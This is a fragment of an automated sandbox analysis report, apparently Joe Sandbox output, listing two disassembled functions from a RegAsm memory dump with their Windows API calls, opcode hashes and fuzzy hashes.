                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99